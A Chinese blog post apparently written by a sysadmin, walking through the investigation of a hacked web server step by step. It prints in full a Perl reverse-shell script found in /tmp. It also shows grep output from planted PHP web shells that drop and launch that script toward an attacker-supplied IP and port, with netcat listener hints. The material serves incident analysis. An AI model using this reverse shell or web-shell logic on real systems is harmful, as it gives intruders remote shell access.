Web服務器中如何排查病毒

發布時間：2021-11-17 09:56:48 來源：億速云閱讀：200 作者：小新欄目：云計算

這篇文章主要介紹Web服務器中如何排查病毒，文中介紹的非常詳細，具有一定的參考價值，感興趣的小伙伴們一定要看完！

一服務器疑似被掛馬，現象是從百度搜該站點，出來的結果大部分為×××網站。

馬上登錄服務器（半夜好困啊）。執行如下的步驟：

1、 檢查系統帳號，看有沒有異常帳號--如冒充系統帳號，改一個字母，看起來像系統帳號，混淆視聽。有的家伙狡猾的干活，創建個帳號為“…”極端不易察覺。

2、 檢查最近登錄用戶的ip：last 查看9月9號以后到目前的情況，經確認，有一個ip來路不對。

3、 檢查系統初始化文件inittab,運行級別為3，為發現異常。一些hacker喜歡在這里下手，加上respawn這樣的行，保證他的程序被殺后自動重啟，不屈不撓地抗爭系統管理員的絞殺。

4、 檢查運行級別目錄的腳本，ls –al /etc/rc3.d ,未見異常。

5、 檢查自動任務 crontab –l ，root用戶和web運行用戶www各檢查一遍，未見任何異常。

6、 檢查歷史記錄history 發現有安裝sendmail的情形，問客戶是否有這個，答：不是自己裝的。

7、 檢查web目錄，發現其權限為777，這可讓人不太放心了，心中猜想，可能是從這里下手了。

8、 檢查一下目錄/tmp,發現有個文件不太對勁，文件名是spider_bc，打開看一下，是個perl腳本，其內容為：

[root@localhost mysql]# more /tmp/spider_bc

#!/usr/bin/perl

use Socket;

$cmd= "lynx";

$system= 'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$ARGV[0];

$port=$ARGV[1];

$iaddr=inet_aton($target) || die("Error: $!\n");

$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system($system);

close(STDIN);

close(STDOUT);

close(STDERR);

據客戶開發人員反應，這文件刪除以后，一會又自動生成了。

9、 初步懷疑是hacker利用web權限設置及程序漏洞上傳了程序后，自動生成這個文件，于是進入到網站根目錄，然后執行grep –r “spider” * ,片刻，結果出來了，下面節錄部分：

[root@localhost www]# grep spider_bc * -r

/plusbak/viev. php: echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功 ' : '創建/tmp/spider_bc失敗 ';

/plusbak/viev. php: echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/plusbak/viev. php: echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功 ' : '創建/tmp/spider_bc.c失敗 ';

/plusbak/viev. php: @unlink('/tmp/spider_bc.c');

/plusbak/viev. php: echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. php: echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功 ' : '創建/tmp/spider_bc失敗 ';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. php: echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. php: echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功 ' : '創建/tmp/spider_bc.c失敗 ';

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. php: @unlink('/tmp/spider_bc.c');

/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. php: echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/developers/cache/default/index_sql. php : echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功 ' : '創建/tmp/spider_bc失敗 ';

/developers/developers/cache/default/index_sql. php : echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

/developers/developers/cache/default/index_sql. php : echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功 ' : '創建/tmp/spider_bc.c失敗 ';

/developers/developers/cache/default/index_sql. php : @unlink('/tmp/spider_bc.c');

/developers/developers/cache/default/index_sql. php : echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';

以上是“Web服務器中如何排查病毒”這篇文章的所有內容，感謝各位的閱讀！希望分享的內容對大家有幫助，更多相關知識，歡迎關注億速云行業資訊頻道！

向AI問一下細節

中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

Web服務器中如何排查病毒

猜你喜歡

中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

Web服務器中如何排查病毒

猜你喜歡

最新資訊

相關推薦

相關標簽